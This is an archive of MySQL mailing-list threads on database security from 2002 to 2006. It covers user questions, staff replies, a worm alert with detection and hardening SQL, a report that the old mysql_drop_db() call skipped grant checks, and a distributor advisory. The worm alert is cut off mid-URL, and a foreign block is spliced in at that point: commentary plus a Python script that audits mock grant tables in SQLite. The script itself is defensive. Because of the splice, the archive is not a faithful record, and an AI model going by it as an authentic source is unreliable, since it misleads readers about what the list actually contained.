Re: about mysql security

2006-01-09 Thread Gleb Paharenko
Hello.

Searching in the manual didn't return me any pages which have
"five-tiered" inside. If you're interested in MySQL security read
this:

  http://dev.mysql.com/doc/refman/5.0/en/security.html
  http://dev.mysql.com/doc/refman/5.0/en/privilege-system.html

wangxu wrote:

> I get a concept about mysql security. It's named "five-tiered access
> control". Can you tell me the detail of this concept?

-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.NET http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Gleb Paharenko
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.NET
   <___/   www.mysql.com




-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]



about mysql security

2006-01-07 Thread wangxu
I get a concept about MySQL security. It's named "five-tiered access
control". Can you tell me the details of this concept?

Checking MySQL security

2005-11-02 Thread fredzy padzy
Hello everyone,

I'm interested in and working in IT security and have to do some security tests.
Sometimes there is an Oracle DB, sometimes it's MySQL.

I found a lot of free scripts and tools to check the Oracle security
level, but I did not find any for MySQL.

I only found a '.c' file which tries to crack the accounts' passwords.

That's why I write to this mailing list: I wonder if there exist
some tools for MySQL to measure this security...

Hope there are...

Thanks




MySQL Security Alert 2005-01-27

2005-01-27 Thread Arjen Lentz
There is a bot active on the internet that is infecting Windows machines
running MySQL Server:
  http://isc.sans.org/diary.php?isc=a508f4a185755af19ea8bd45444a570b

An alert with background information is already available on:
  http://dev.mysql.com/tech-resources/articles/security_alert.html

The following message contains practical information about how to
protect your system.


1. What is the UDF Worm?
The UDF Worm is self-propagating code that is finding MySQL servers
running on Microsoft Windows with poor firewall and password security.

This worm does not exploit any bugs in MySQL. It does exploit poor
security setups for firewalls and passwords.

This worm is Microsoft Windows specific, however firewall and password
security is important on any platform.


2. What is a User Defined Function (UDF)?
A User Defined Function, often referred to as a UDF, is a part of the
ANSI SQL-99 specification. This feature allows developers to create
custom functions. It is a common feature among the major database
products.


3. What does the UDF Worm do?
The UDF Worm looks for MySQL servers running on Microsoft Windows that
have been exposed to the internet and have either weak or no passwords
installed on the account named "root". Once it finds an account it
installs a UDF, and then uses that machine to scan for other machines
that can possibly be infected.


4. How do I know if my MySQL installation has been infected?
Run the following SQL statement: SELECT * FROM mysql.func;

If a UDF is found with a name of "app_result" then you have probably
been infected with the worm.

You should look at all UDFs and determine whether or not they are
legitimate. The worm is likely to mutate over time and will take on
different UDF names.

You may be able to remove this UDF by running the following SQL
statement: DROP FUNCTION app_result;
Please note however that this does not remove the worm itself once
your system has been infected. See the next section for further details.


5. How do I disinfect my system?

As the worm is of a known family called "WootBot" or "SpyBot", most
virus scanners will pick up the executable with their existing
signature files and alert you.
F-Secure provides additional information on this type of "bot" as well
as tools for removing it:
  http://www.f-secure.com/v-descs/wootbot.shtml

To prevent any unauthorized person or program from connecting to your
database you should verify that all of your current accounts have
passwords and that they are strong passwords (i.e. not easily
guess-able). Remember to always use firewalls and strong passwords to
protect your MySQL Servers.

Please consult your security advisors for the best way to protect your
systems.


6. How do I protect my MySQL Servers on Microsoft Windows?
There are 2 basic steps to protect your MySQL Servers:

 1. Always use strong passwords on all accounts.
 2. Use firewalls to protect your MySQL Servers.

The Windows installation procedure in MySQL 4.1 and up takes additional
steps to ensure that users create a secure setup.

For information about securing your root account on an existing
installation, see 
http://dev.mysql.com/doc/mysql/en/default-privileges.html and 
http://dev.mysql.com/doc/mysql/en/security-against-attack.html.

Specifically, ensure that the root account has a STRONG password that
cannot be easily guessed.

Also, remove the root@'%' account from the grant tables. Connect to the
MySQL server as root; the following example uses the 'mysql' command
line client. Search for "mysql.exe" on your hard drive, and run this
program with the parameters "-u root -p".

Enter password: *
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.9-nt

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> DELETE FROM mysql.user WHERE host = '%' AND user = 'root';
Query OK, 1 row affected (0.03 sec)

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.05 sec)

mysql> quit

This will prevent root logins from other machines.

If you don't require any access to the database server from other
machines, you can even disable networking completely by using the
skip-networking option in your configuration file and restarting the
server. You can also use MySQL Administrator to edit your MySQL
configuration. Local connections are handled via named pipes on an NT
based system (Windows NT4, 2000, XP, 2003).


7. Is this a vulnerability on Microsoft Windows, Linux, or Unix?
This worm is Microsoft Windows specific, however firewall and password
security is important on any platform. 

If your server is behind a firewall, and you have a strong root password,
you are not vulnerable to this worm. If not, take the necessary steps
now to protect your system.

Learn more about strong passwords and firewall setups for Microsoft
Windows here:
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/windows_password_tips.mspx

http://www.
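The detection and hardening steps in sections 4 and 6 of the alert above (look through mysql.func for UDFs you did not install, make sure every account has a password, remove the root@'%' entry) can be turned into a repeatable audit. The script below is an added example, not part of the alert and not MySQL's own tooling: it runs the same kind of SELECT and DELETE statements against an in-memory SQLite stand-in for the mysql.user and mysql.func tables, filled with constructed rows (the password hashes, the 192.168.1.20 host, the my_crc_udf UDF and the KNOWN_UDFS allowlist are all invented for the example). It also removes anonymous accounts, a step the alert does not spell out but which belongs to the same clean-up of the default grant tables. Against a real server the SELECT and DELETE statements run unchanged; the one difference is that a UDF is removed with DROP FUNCTION name followed by FLUSH PRIVILEGES rather than by deleting the mysql.func row directly.

```python
import sqlite3

# Constructed, in-memory stand-in for the MySQL grant tables (mysql.user and
# mysql.func) so the audit queries below run without a MySQL server.  Column
# names follow the MySQL 4.x layout; every row value is invented.
USER_ROWS = [
    ("localhost",    "root", "*A4B6157319038724E3560894F7F932C8886EBFCF"),
    ("%",            "root", ""),            # remote root with no password
    ("localhost",    "",     ""),            # anonymous account
    ("192.168.1.20", "app",  "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
]
FUNC_ROWS = [
    ("my_crc_udf", "my_udf.dll",     0),     # hypothetical, legitimate UDF
    ("app_result", "app_result.dll", 0),     # name the alert attributes to the worm
]
# UDF names the DBA knows were installed deliberately (hypothetical allowlist).
KNOWN_UDFS = {"my_crc_udf"}


def load_snapshot():
    """Build the fake grant tables and return an open sqlite3 connection."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (Host TEXT, User TEXT, Password TEXT)")
    conn.execute("CREATE TABLE func (name TEXT, dl TEXT, type INTEGER)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", USER_ROWS)
    conn.executemany("INSERT INTO func VALUES (?, ?, ?)", FUNC_ROWS)
    return conn


def unknown_udfs(conn, known=KNOWN_UDFS):
    """Section 4 of the alert: every UDF in mysql.func that is not on the allowlist."""
    rows = conn.execute("SELECT name, dl FROM func ORDER BY name").fetchall()
    return [(name, dl) for name, dl in rows if name not in known]


def weak_accounts(conn):
    """Accounts with an empty password or an empty (anonymous) user name."""
    return conn.execute(
        "SELECT Host, User FROM user WHERE Password = '' OR User = '' "
        "ORDER BY Host, User"
    ).fetchall()


def remote_root_hosts(conn):
    """Hosts other than localhost from which 'root' is allowed to log in."""
    rows = conn.execute(
        "SELECT Host FROM user WHERE User = 'root' AND Host <> 'localhost'"
    ).fetchall()
    return [host for (host,) in rows]


def harden(conn, known=KNOWN_UDFS):
    """Apply the alert's remediation to the snapshot and report what changed.

    On a real server a UDF is removed with `DROP FUNCTION <name>` followed by
    `FLUSH PRIVILEGES`; against the stand-in table we delete the mysql.func
    row, which is the effect DROP FUNCTION has on that table.
    """
    dropped = [name for name, _ in unknown_udfs(conn, known)]
    for name in dropped:
        conn.execute("DELETE FROM func WHERE name = ?", (name,))
    # Same statement the alert shows: remove the root@'%' entry.
    removed_root = conn.execute(
        "DELETE FROM user WHERE Host = '%' AND User = 'root'"
    ).rowcount
    # Anonymous accounts are another password-less way in; remove them too.
    removed_anon = conn.execute("DELETE FROM user WHERE User = ''").rowcount
    conn.commit()
    return {
        "dropped_udfs": dropped,
        "removed_root_entries": removed_root,
        "removed_anonymous": removed_anon,
    }


if __name__ == "__main__":
    db = load_snapshot()
    print("suspicious UDFs:  ", unknown_udfs(db))
    print("weak accounts:    ", weak_accounts(db))
    print("remote root hosts:", remote_root_hosts(db))
    print("hardening:        ", harden(db))
    print("remote root after:", remote_root_hosts(db))
    print("weak after:       ", weak_accounts(db))
```

The allowlist is the important design choice: the alert warns that the worm may change UDF names, so the check is "anything not explicitly known", not "anything called app_result". The same logic applies to the account checks, which flag rows by property (empty password, anonymous user, non-local root) rather than by a fixed list of bad names.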

Re: About Mysql Security

2004-09-17 Thread Egor Egorov
Mike Bao <[EMAIL PROTECTED]> wrote:

> Last week, all the tables in one database were deleted, which is the
> second time since I upgraded my operating system from NT 4.0 to Server
> 2003. Before that, they had been deleted many times.
> 
> I just copied all table files to one database (one directory). They
> will work normally. I don't know whether my operation is correct or not. And I
> want to get more suggestions about MySQL security, the more details the
> better.
> 
> Look forward to hearing from you, thanks a lot.

To ask a correct question you should know half of the answer. :) 

For your case, do FLUSH TABLES and LOCK TABLES before taking 
the files snapshot. 

Or, even better, use mysqlhotcopy. 





-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.net http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Egor Egorov
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.net
   <___/   www.mysql.com







About Mysql Security

2004-09-15 Thread Mike Bao
Hi,

Last week, all the tables in one database were deleted, which is the
second time since I upgraded my operating system from NT 4.0 to Server
2003. Before that, they had been deleted many times.

I just copied all table files to one database (one directory). They
will work normally. I don't know whether my operation is correct or not. And I
want to get more suggestions about MySQL security, the more details the
better.

Look forward to hearing from you, thanks a lot.

Michael




Re: MySQL Security

2004-07-01 Thread Egor Egorov
Sheraz <[EMAIL PROTECTED]> wrote:

> How can I achieve the security aspect in MySQL?
> How secure can we make transactions over the internet for
> 3306 ?

Use SSL. 








MySQL Security

2004-06-30 Thread Sheraz
How can I achieve the security aspect in MySQL?
How secure can we make transactions over the internet for
3306 ?


Thanks
Sak






Re: MYSQL Security

2004-01-29 Thread Timotius Alfa
Thank you Victoria and Mikhail. 
 
thanks a lot 


Re: MYSQL Security

2004-01-28 Thread Victoria Reznichenko
Timotius Alfa <[EMAIL PROTECTED]> wrote:
> 
> Hi All, 
> 
> I'm a newbie in MySQL. Would you please tell me about MySQL security? 
> 
> I used Windows2000 for mysql server. 
> 

The privilege system of MySQL is described in the following section of the manual:
http://www.mysql.com/doc/en/Privilege_system.html



-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.net http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Victoria Reznichenko
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.net
   <___/   www.mysql.com








Re: MYSQL Security

2004-01-28 Thread Mikhail Entaltsev
Hi,

> I'm a newbie in MySQL. Would you please tell me about MySQL security? 

Generally you can find a lot of information about MySQL on 
http://www.mysql.com/doc/en/

About your question you can read here:
http://www.mysql.com/doc/en/Privilege_system.html

Mikhail.




MYSQL Security

2004-01-27 Thread Timotius Alfa


Hi All, 

I'm a newbie in MySQL. Would you please tell me about MySQL security? 

I used Windows2000 for mysql server. 

thank you 

 



RE: MySQL & security

2003-04-05 Thread Michael Shulman
In your "user" table in the mysql database, remove all the lines that allow
logins from other hosts.

mysql> use mysql
mysql> delete from user where host <> "localhost";
mysql> flush privileges;

-ms





MySQL & security

2003-04-05 Thread Mel
I'm running MySQL 4.0.12-standard on Mac OS X (10.2.4), for local use 
only. As no-one else needs access to the database, I'm trying to make 
it as secure as possible... so far I've added skip-name-resolve, 
skip-networking and safe-user-create into my.cnf. I've also seen 
bind-ip=127.0.0.1 mentioned a few times as well, but I'm not sure if 
this is needed if skip-networking is set, or if one overrides the 
other?

As you can probably tell, I'm on the new side to this, so any help or 
advice is appreciated.

TIA!

Mel



Re: MySQL Security Flaw - Dropped Databases

2002-12-24 Thread Lenz Grimmer

Hi,

On Thu, 19 Dec 2002, Michael Widenius wrote:

> With 'DROP DATABASE database_name'.
> Through the deprecated client function 'mysql_drop_db()'.
>
> The first case works correctly but in the second case the grant check
> is not done.  I tracked this down to a merge I did between the 4.0 and
> 4.1 code in September last year :(
>
> The reason you could not repeat this is that MySQLFront() uses the old
> mysql_drop_db() call while you probably tested this with some client
> which uses the new way to drop a database.
>
> I will fix this at once for the next 4.0 release. Thanks for reporting this!

JFYI: this bug was fixed in MySQL 4.0.7, which will be available shortly
(just uploading the files to give the mirrors some time to sync). A full
announcement will be sent out on Friday.

Happy holidays!

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php




MySQL Security Flaw - Dropped Databases

2002-12-19 Thread Michael Widenius

Hi!


Mark> Hi,

Gary>  I'd like to add to the "security flaw" thread with my own experience.
Gary> I have been hosting MySQL databases for over 2 years and on a few occasions
Gary> have had user databases disappear.

Gary>  Last month one of my admin databases was dropped.  The only user 
Gary> who has
Gary> access to that database is root (me) and even after double checking all my
Gary> scripts/code and database/table permissions I was unable to determine how it
Gary> was done.  I was able to track down the culprit and asked him how he did it.
Gary> He replied:

Gary>"When use MySQL-Front(version 2.5) as client to connect to 4.x version
Gary> MySQL server,any users(even without any granted rights) can drop any
Gary> databases. I guess there is a horrible security hole exist in MySQL 4.x
Gary> version."

Gary> I don't really understand this client side exploit, nevertheless, the
Gary> database WAS dropped and that is how he told me he did it.  Is this a red
Gary> herring (false lead)?   If it is true, is this exploit being addressed?

I checked this and noticed that your user is right.

In MySQL we have two different ways to drop a database:

With 'DROP DATABASE database_name'.
Through the deprecated client function 'mysql_drop_db()'.

The first case works correctly but in the second case the grant check
is not done.  I tracked this down to a merge I did between the 4.0 and
4.1 code in September last year :(

The reason you could not repeat this is that MySQLFront() uses the old
mysql_drop_db() call while you probably tested this with some client
which uses the new way to drop a database.

I will fix this at once for the next 4.0 release. Thanks for reporting this!

Regards,
Monty

-- 
MySQL 2003 Users Conference -> http://www.mysql.com/events/uc2003/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Mr. Michael Widenius <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__   MySQL AB, CTO
/_/  /_/\_, /___/\___\_\___/   Helsinki, Finland
   <___/   www.mysql.com





Re: MySQL security flaws uncovered

2002-12-18 Thread Stefan Hinz, iConnect \(Berlin\)
Csongor, Michael:

>> Maybe they're taking the MS route.

> I second this. These vulnerabilities are serious, they must be given
> more attention. Apache, PHP, RedHat and so on and so on are very careful
> with issues like this, all vulnerabilities/exploits are immediately
> published through all possible channels.

Have a look at the website of the person who uncovered the security flaw:


Vendor Response
03. December 2002 Vendor was contacted by email.
04. December 2002 Vendor informs me that bugs are fixed and that they
started building new packages.
12. December 2002 Vendor has released MySQL 3.23.54 which fixes these
vulnerabilities.


Doesn't look like the "MS way" to me. See for yourselves:

http://security.e-matters.de/advisories/042002.html

Regards,
--
  Stefan Hinz <[EMAIL PROTECTED]>
  CEO / Geschäftsleitung iConnect GmbH <http://iConnect.de>
  Heesestr. 6, 12169 Berlin (Germany)
  Telefon: +49 30 7970948-0  Fax: +49 30 7970948-3






RE: MySQL security flaws uncovered

2002-12-18 Thread Adam Nelson
The real problem is the lack of a central knowledgebase.  Is there one
that I'm not aware of?  Even if there is, it should be very obvious off
the front page of the website.





Re: MySQL Security Flaw - Dropped Databases

2002-12-18 Thread Lenz Grimmer

Hi,

thanks for your message.

On Wed, 18 Dec 2002, Gary Huntress wrote:

> I'd like to add to the "security flaw" thread with my own experience. I
> have been hosting MySQL databases for over 2 years and on a few
> occasions have had user databases disappear.
>
> Last month one of my admin databases was dropped.  The only user who has
> access to that database is root (me) and even after double checking all
> my scripts/code and database/table permissions I was unable to determine
> how it was done.  I was able to track down the culprit and asked him how
> he did it. He replied:
>
> "When use MySQL-Front(version 2.5) as client to connect to 4.x version
> MySQL server,any users(even without any granted rights) can drop any
> databases. I guess there is a horrible security hole exist in MySQL 4.x
> version."
>
> I don't really understand this client side exploit, nevertheless, the
> database WAS dropped and that is how he told me he did it.  Is this a
> red herring (false lead)?  If it is true, is this exploit being
> addressed?

Well, we can only address what we get informed about! In the future, it
would be good if you could inform us about such potential security
problems by sending your message to our mail address [EMAIL PROTECTED]

I've not heard about this specific issue before, but will forward it to
our developers for further analysis.

Thanks,

LenZ




MySQL Security Flaw - Dropped Databases

2002-12-18 Thread Gary Huntress
Hi,

I'd like to add to the "security flaw" thread with my own experience.
I have been hosting MySQL databases for over 2 years and on a few occasions
have had user databases disappear.

Last month one of my admin databases was dropped.  The only user who has
access to that database is root (me) and even after double checking all my
scripts/code and database/table permissions I was unable to determine how it
was done.  I was able to track down the culprit and asked him how he did it.
He replied:

  "When use MySQL-Front(version 2.5) as client to connect to 4.x version
MySQL server,any users(even without any granted rights) can drop any
databases. I guess there is a horrible security hole exist in MySQL 4.x
version."

I don't really understand this client side exploit, nevertheless, the
database WAS dropped and that is how he told me he did it.  Is this a red
herring (false lead)?   If it is true, is this exploit being addressed?


Regards,
Gary "SuperID" Huntress
===
FreeSQL.org offering free database hosting to developers
Visit http://www.freesql.org






Re: MySQL security flaws uncovered

2002-12-18 Thread Lenz Grimmer

On Wed, 18 Dec 2002, Csongor Fagyal wrote:

> Michael She wrote:
>
> > It's bad for business : )
> > Maybe they're taking the MS route.
>
> I second this. These vulnerabilities are serious, they must be given
> more attention. Apache, PHP, RedHat and so on and so on are very careful
> with issues like this, all vulnerabilities/exploits are immediately
> published through all possible channels. Yes, it is always a pain to
> find out something like this, obviously the MySQL team just would like
> to forget this once and for all, but doing troublesome
> reinstalls/upgrades and so on is still better then getting our system
> hacked.

No, this is definitely not the case. As I've written in a separate
message, we immediately reacted and released 3.23.54 to resolve this
issue. The security problem was clearly mentioned in the release
announcement that was posted to our announce mailing list:

http://lists.mysql.com/cgi-ez/ezmlm-cgi?2:mss:144:200212:cedhfgmdkobfodelamkh

But I fully agree - in this case the release announcement should have been
put up on the web site as well. This was an error on our side and it will
not happen again.

We will send out another (more public) announcement later today, which
will also be put up on the web pages.

Bye,
LenZ




Re: MySQL security flaws uncovered

2002-12-18 Thread Csongor Fagyal
Michael She wrote:

> It's bad for business : )
>
> Maybe they're taking the MS route.

I second this. These vulnerabilities are serious, they must be given 
more attention. Apache, PHP, RedHat and so on and so on are very careful 
with issues like this, all vulnerabilities/exploits are immediately 
published through all possible channels. Yes, it is always a pain to 
find out something like this, obviously the MySQL team just would like 
to forget this once and for all, but doing troublesome 
reinstalls/upgrades and so on is still better than getting our system 
hacked.

- Cs.

> At 12:19 AM 12/18/2002 -0500, Michael Bacarella wrote:
>
> > A good question posted to another list..
> >
> >  forwarded message follows 
> >
> > > Several vulnerabilities have been found in the MySQL database system, a
> > > light database package commonly used in Linux environments but which runs
> > > also on Microsoft platforms, HP-Unix, Mac OS and more.
> > > http://zdnet.com.com/2100-1104-977958.html
> >
> > So why no mention on the MySQL.COM site?  That rather bugs me.  In contrast,
> > sites for products like Apache or Bind are very clear about current/past
> > security issues.
> >
> > Is MySQL.COM the wrong place?










Re: MySQL security flaws uncovered

2002-12-18 Thread Michael She
It's bad for business : )

Maybe they're taking the MS route.


At 12:19 AM 12/18/2002 -0500, Michael Bacarella wrote:

> A good question posted to another list..
>
>  forwarded message follows 
>
> > Several vulnerabilities have been found in the MySQL database system, a
> > light database package commonly used in Linux environments but which runs
> > also on Microsoft platforms, HP-Unix, Mac OS and more.
> > http://zdnet.com.com/2100-1104-977958.html
>
> So why no mention on the MySQL.COM site?  That rather bugs me.  In contrast,
> sites for products like Apache or Bind are very clear about current/past
> security issues.
>
> Is MySQL.COM the wrong place?
>
> --
> Michael Bacarella  | Netgraft Corp
>                    | 545 Eighth Ave #401
>  Systems Analysis  | New York, NY 10018
> Technical Support  | 212 946-1038 | 917 670-6982
>  Managed Services  | http://netgraft.com/



--
Michael She  : [EMAIL PROTECTED]
Mobile   : (519) 589-7309
WWW Homepage : http://www.binaryio.com/






Re: MySQL security flaws uncovered

2002-12-18 Thread Lenz Grimmer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Wed, 18 Dec 2002, Michael Bacarella wrote:

> A good question posted to another list..
>
>  forwarded message follows 
>
> > Several vulnerabilities have been found in the MySQL database system,
> > a light database package commonly used in Linux environments but which
> > runs also on Microsoft platforms, HP-Unix, Mac OS and more.
> > http://zdnet.com.com/2100-1104-977958.html
>
> So why no mention on the MySQL.COM site?  That rather bugs me.  In
> contrast, sites for products like Apache or Bind are very clear about
> current/past security issues.
>
> Is MySQL.COM the wrong place?

No, it was an internal communication problem - this was the first time I
had to handle a security problem and I was not aware, that our PR team did
not catch my internal message about the security vulnerability. We will
send out an announcement today, which will also be put on the web pages.
You can find my initial announcement here:

http://lists.mysql.com/cgi-ez/ezmlm-cgi?2:mss:144:200212:cedhfgmdkobfodelamkh

Sorry for the confusion - next time I hope to get it straight at once.

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE+ACX8SVDhKrJykfIRAgbBAJ9hI3CXVhnExGKnIR76eA/XqpJyiQCfZhHP
iB3kePO5YLRO+6wt5Lv5Qf4=
=M4MK
-END PGP SIGNATURE-






MySQL security flaws uncovered

2002-12-17 Thread Michael Bacarella
A good question posted to another list..

 forwarded message follows 

> Several vulnerabilities have been found in the MySQL database system, a
> light database package commonly used in Linux environments but which runs
> also on Microsoft platforms, HP-Unix, Mac OS and more.
> http://zdnet.com.com/2100-1104-977958.html

So why no mention on the MySQL.COM site?  That rather bugs me.  In contrast, 
sites for products like Apache or Bind are very clear about current/past 
security issues.

Is MySQL.COM the wrong place?

-- 
Michael Bacarella  | Netgraft Corp
   | 545 Eighth Ave #401
 Systems Analysis  | New York, NY 10018
Technical Support  | 212 946-1038 | 917 670-6982
 Managed Services  | http://netgraft.com/






Re: MySQL security vulnerabilites question

2002-12-17 Thread Lenz Grimmer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

On Tue, 17 Dec 2002, Jannie Qu wrote:

> I got the following information. Does any one of you know whether it
> will impact my MySQL db server or not: Version 3.23.53 with InnoDB on
> Mac OS Darwin Kernel Version 6.2. If it does, what's the solution?

Yes, an unpatched MySQL 3.23.53 is vulnerable to the mentioned security
problems. We provide updated binaries for Mac OS X 10.2 on our download
web pages: http://www.mysql.com/downloads/mysql-3.23.html

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE9/4SISVDhKrJykfIRAhacAJ9F2DS04VyE3Pk4NyaFd03JteZD5QCfd4WU
QKts7z3+AZ/TkXK+vaK4VcI=
=bQUF
-END PGP SIGNATURE-






MySQL security vulnerabilites question

2002-12-17 Thread Jannie Qu
Hi, all,

Greetings.

I got the following information. Does any one of you know whether it will 
impact my MySQL db server or not: Version 3.23.53 with InnoDB on Mac OS 
Darwin Kernel Version 6.2. If it does, what's the solution?

Thank you,
Jannie Qu

===
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, December 17, 2002 8:57 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [CLA-2002:555] Conectiva Linux Security Announcement - MySQL


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- --

PACKAGE   : MySQL
SUMMARY   : Several Vulnerabilities
DATE  : 2002-12-17 11:51:00
ID: CLA-2002:555
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
MySQL is a very popular SQL database, distributed under the GNU-GPL
license.

Stefan Esser from e-matters[1] discovered several vulnerabilities in
the MySQL code that affect both the server and the client library
(libmysql) of MySQL.

The server vulnerabilities can be exploited to crash the MySQL
server, bypass password restrictions or even execute arbitrary code
with the privileges of the user running the server process.

The library ones consist of an arbitrary size heap overflow and a
memory addressing problem that can both be exploited to crash or
execute arbitrary code in programs linked against libmysql.

More details about each vulnerability can be found in the e-matters
security advisory[2].

The Common Vulnerabilities and Exposures project (cve.mitre.org) is
tracking these issues with the names CAN-2002-1373, CAN-2002-1374,
CAN-2002-1375 and CAN-2002-1376.


SOLUTION
We recommend that all MySQL users upgrade their packages as soon as
possible.

IMPORTANT: after the upgrade the mysql service must be restarted
manually. In order to do that, run the following command as root:

# /sbin/service mysql restart

It is also recommended to restart all programs linked against
libmysql. A list of such programs in execution can be obtained with
the following command:

# /usr/sbin/lsof | grep libmysql


REFERENCES:
1.http://www.e-matters.de/
2.http://security.e-matters.de/advisories/042002.html
3.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1373
4.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1374
5.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1375
6.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1376


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-bench-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-client-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-devel-static-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/MySQL-doc-3.23.36-14U60_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/MySQL-3.23.36-14U60_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-bench-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-client-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-devel-static-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/MySQL-doc-3.23.36-14U70_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/MySQL-3.23.36-14U70_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-bench-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-client-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-devel-static-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/MySQL-doc-3.23.46-4U80_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/MySQL-3.23.46-4U80_2cl.src.rpm


ADDITIONAL INSTRUCTIONS
Users of Conectiva Linux version 6.0 or higher may use apt to perform
upgrades of RPM packages:

- run: apt-get update
- after that, execute: apt-get upgrade

Detailed instructions regarding the use of apt and upgrade examples
can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
o

Mysql security and CGI

2002-11-09 Thread raj
Hello all!

I am working on a site which is using mod_perl and a mysql database on
Linux with Apache. I am also putting cookies and user address information
into a "cookies" table to fill up form fields for subsequent visits.
Standard enough. Also, the database is on the same server as apache.

